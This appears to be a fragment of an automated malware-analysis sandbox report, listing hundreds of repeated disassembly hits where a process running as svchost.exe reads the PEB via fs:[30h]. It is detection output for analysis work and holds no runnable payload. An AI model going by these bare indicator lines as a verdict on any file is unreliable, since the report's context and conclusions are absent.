Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C36154 mov eax, dword ptr fs:[00000030h]	1_2_03C36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03D04164 mov eax, dword ptr fs:[00000030h]	1_2_03D04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03D04164 mov eax, dword ptr fs:[00000030h]	1_2_03D04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]	1_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]	1_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]	1_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]	1_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]	1_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]	1_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]	1_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]	1_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]	1_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]	1_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CDA118 mov ecx, dword ptr fs:[00000030h]	1_2_03CDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]	1_2_03CDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]	1_2_03CDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]	1_2_03CDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CF0115 mov eax, dword ptr fs:[00000030h]	1_2_03CF0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C60124 mov eax, dword ptr fs:[00000030h]	1_2_03C60124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB20DE mov eax, dword ptr fs:[00000030h]	1_2_03CB20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]	1_2_03C2A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C380E9 mov eax, dword ptr fs:[00000030h]	1_2_03C380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB60E0 mov eax, dword ptr fs:[00000030h]	1_2_03CB60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]	1_2_03C2C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C720F0 mov ecx, dword ptr fs:[00000030h]	1_2_03C720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C3208A mov eax, dword ptr fs:[00000030h]	1_2_03C3208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CC80A8 mov eax, dword ptr fs:[00000030h]	1_2_03CC80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CF60B8 mov eax, dword ptr fs:[00000030h]	1_2_03CF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]	1_2_03CF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C32050 mov eax, dword ptr fs:[00000030h]	1_2_03C32050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB6050 mov eax, dword ptr fs:[00000030h]	1_2_03CB6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C5C073 mov eax, dword ptr fs:[00000030h]	1_2_03C5C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB4000 mov ecx, dword ptr fs:[00000030h]	1_2_03CB4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]	1_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]	1_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]	1_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]	1_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]	1_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]	1_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]	1_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]	1_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]	1_2_03C4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]	1_2_03C4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]	1_2_03C4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]	1_2_03C4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C2A020 mov eax, dword ptr fs:[00000030h]	1_2_03C2A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C2C020 mov eax, dword ptr fs:[00000030h]	1_2_03C2C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CC6030 mov eax, dword ptr fs:[00000030h]	1_2_03CC6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C3C7C0 mov eax, dword ptr fs:[00000030h]	1_2_03C3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB07C3 mov eax, dword ptr fs:[00000030h]	1_2_03CB07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]	1_2_03C527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]	1_2_03C527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]	1_2_03C527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CBE7E1 mov eax, dword ptr fs:[00000030h]	1_2_03CBE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C347FB mov eax, dword ptr fs:[00000030h]	1_2_03C347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C347FB mov eax, dword ptr fs:[00000030h]	1_2_03C347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CD678E mov eax, dword ptr fs:[00000030h]	1_2_03CD678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C307AF mov eax, dword ptr fs:[00000030h]	1_2_03C307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CE47A0 mov eax, dword ptr fs:[00000030h]	1_2_03CE47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6674D mov esi, dword ptr fs:[00000030h]	1_2_03C6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6674D mov eax, dword ptr fs:[00000030h]	1_2_03C6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6674D mov eax, dword ptr fs:[00000030h]	1_2_03C6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C30750 mov eax, dword ptr fs:[00000030h]	1_2_03C30750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CBE75D mov eax, dword ptr fs:[00000030h]	1_2_03CBE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72750 mov eax, dword ptr fs:[00000030h]	1_2_03C72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72750 mov eax, dword ptr fs:[00000030h]	1_2_03C72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB4755 mov eax, dword ptr fs:[00000030h]	1_2_03CB4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C38770 mov eax, dword ptr fs:[00000030h]	1_2_03C38770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]	1_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]	1_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]	1_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]	1_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]	1_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]	1_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]	1_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]	1_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]	1_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]	1_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]	1_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]	1_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6C700 mov eax, dword ptr fs:[00000030h]	1_2_03C6C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C30710 mov eax, dword ptr fs:[00000030h]	1_2_03C30710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C60710 mov eax, dword ptr fs:[00000030h]	1_2_03C60710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6C720 mov eax, dword ptr fs:[00000030h]	1_2_03C6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6C720 mov eax, dword ptr fs:[00000030h]	1_2_03C6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6273C mov eax, dword ptr fs:[00000030h]	1_2_03C6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6273C mov ecx, dword ptr fs:[00000030h]	1_2_03C6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6273C mov eax, dword ptr fs:[00000030h]	1_2_03C6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CAC730 mov eax, dword ptr fs:[00000030h]	1_2_03CAC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h]	1_2_03C6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6A6C7 mov eax, dword ptr fs:[00000030h]	1_2_03C6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]	1_2_03CAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]	1_2_03CAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]	1_2_03CAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]	1_2_03CAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB06F1 mov eax, dword ptr fs:[00000030h]	1_2_03CB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB06F1 mov eax, dword ptr fs:[00000030h]	1_2_03CB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C34690 mov eax, dword ptr fs:[00000030h]	1_2_03C34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C34690 mov eax, dword ptr fs:[00000030h]	1_2_03C34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6C6A6 mov eax, dword ptr fs:[00000030h]	1_2_03C6C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C666B0 mov eax, dword ptr fs:[00000030h]	1_2_03C666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C4C640 mov eax, dword ptr fs:[00000030h]	1_2_03C4C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CF866E mov eax, dword ptr fs:[00000030h]	1_2_03CF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CF866E mov eax, dword ptr fs:[00000030h]	1_2_03CF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6A660 mov eax, dword ptr fs:[00000030h]	1_2_03C6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6A660 mov eax, dword ptr fs:[00000030h]	1_2_03C6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C62674 mov eax, dword ptr fs:[00000030h]	1_2_03C62674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CAE609 mov eax, dword ptr fs:[00000030h]	1_2_03CAE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]	1_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]	1_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]	1_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]	1_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]	1_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]	1_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]	1_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72619 mov eax, dword ptr fs:[00000030h]	1_2_03C72619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C4E627 mov eax, dword ptr fs:[00000030h]	1_2_03C4E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C66620 mov eax, dword ptr fs:[00000030h]	1_2_03C66620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C68620 mov eax, dword ptr fs:[00000030h]	1_2_03C68620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C3262C mov eax, dword ptr fs:[00000030h]	1_2_03C3262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6E5CF mov eax, dword ptr fs:[00000030h]	1_2_03C6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6E5CF mov eax, dword ptr fs:[00000030h]	1_2_03C6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C365D0 mov eax, dword ptr fs:[00000030h]	1_2_03C365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]	1_2_03C6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]	1_2_03C6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C325E0 mov eax, dword ptr fs:[00000030h]	1_2_03C325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6C5ED mov eax, dword ptr fs:[00000030h]	1_2_03C6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6C5ED mov eax, dword ptr fs:[00000030h]	1_2_03C6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C32582 mov eax, dword ptr fs:[00000030h]	1_2_03C32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C32582 mov ecx, dword ptr fs:[00000030h]	1_2_03C32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C64588 mov eax, dword ptr fs:[00000030h]	1_2_03C64588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6E59C mov eax, dword ptr fs:[00000030h]	1_2_03C6E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]	1_2_03CB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]	1_2_03CB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]	1_2_03CB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C545B1 mov eax, dword ptr fs:[00000030h]	1_2_03C545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C545B1 mov eax, dword ptr fs:[00000030h]	1_2_03C545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C38550 mov eax, dword ptr fs:[00000030h]	1_2_03C38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C38550 mov eax, dword ptr fs:[00000030h]	1_2_03C38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6656A mov eax, dword ptr fs:[00000030h]	1_2_03C6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6656A mov eax, dword ptr fs:[00000030h]	1_2_03C6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6656A mov eax, dword ptr fs:[00000030h]	1_2_03C6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CC6500 mov eax, dword ptr fs:[00000030h]	1_2_03CC6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]	1_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]	1_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]	1_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]	1_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]	1_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]	1_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]	1_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]	1_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]	1_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]	1_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]	1_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]	1_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]	1_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]	1_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]	1_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]	1_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]	1_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]	1_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C304E5 mov ecx, dword ptr fs:[00000030h]	1_2_03C304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CEA49A mov eax, dword ptr fs:[00000030h]	1_2_03CEA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C364AB mov eax, dword ptr fs:[00000030h]	1_2_03C364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C644B0 mov ecx, dword ptr fs:[00000030h]	1_2_03C644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CBA4B0 mov eax, dword ptr fs:[00000030h]	1_2_03CBA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]	1_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]	1_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]	1_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]	1_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]	1_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]	1_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]	1_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]	1_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CEA456 mov eax, dword ptr fs:[00000030h]	1_2_03CEA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C2645D mov eax, dword ptr fs:[00000030h]	1_2_03C2645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C5245A mov eax, dword ptr fs:[00000030h]	1_2_03C5245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CBC460 mov ecx, dword ptr fs:[00000030h]	1_2_03CBC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C5A470 mov eax, dword ptr fs:[00000030h]	1_2_03C5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C5A470 mov eax, dword ptr fs:[00000030h]	1_2_03C5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C5A470 mov eax, dword ptr fs:[00000030h]	1_2_03C5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C68402 mov eax, dword ptr fs:[00000030h]	1_2_03C68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C68402 mov eax, dword ptr fs:[00000030h]	1_2_03C68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C68402 mov eax, dword ptr fs:[00000030h]	1_2_03C68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C2E420 mov eax, dword ptr fs:[00000030h]	1_2_03C2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C2E420 mov eax, dword ptr fs:[00000030h]	1_2_03C2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C2E420 mov eax, dword ptr fs:[00000030h]	1_2_03C2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C2C427 mov eax, dword ptr fs:[00000030h]	1_2_03C2C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]	1_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]	1_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]	1_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]	1_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]	1_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]	1_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]	1_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C50BCB mov eax, dword ptr fs:[00000030h]	1_2_03C50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C50BCB mov eax, dword ptr fs:[00000030h]	1_2_03C50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C50BCB mov eax, dword ptr fs:[00000030h]	1_2_03C50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C30BCD mov eax, dword ptr fs:[00000030h]	1_2_03C30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C30BCD mov eax, dword ptr fs:[00000030h]	1_2_03C30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C30BCD mov eax, dword ptr fs:[00000030h]	1_2_03C30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CDEBD0 mov eax, dword ptr fs:[00000030h]	1_2_03CDEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C38BF0 mov eax, dword ptr fs:[00000030h]	1_2_03C38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C38BF0 mov eax, dword ptr fs:[00000030h]	1_2_03C38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C38BF0 mov eax, dword ptr fs:[00000030h]	1_2_03C38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C5EBFC mov eax, dword ptr fs:[00000030h]	1_2_03C5EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CBCBF0 mov eax, dword ptr fs:[00000030h]	1_2_03CBCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C40BBE mov eax, dword ptr fs:[00000030h]	1_2_03C40BBE
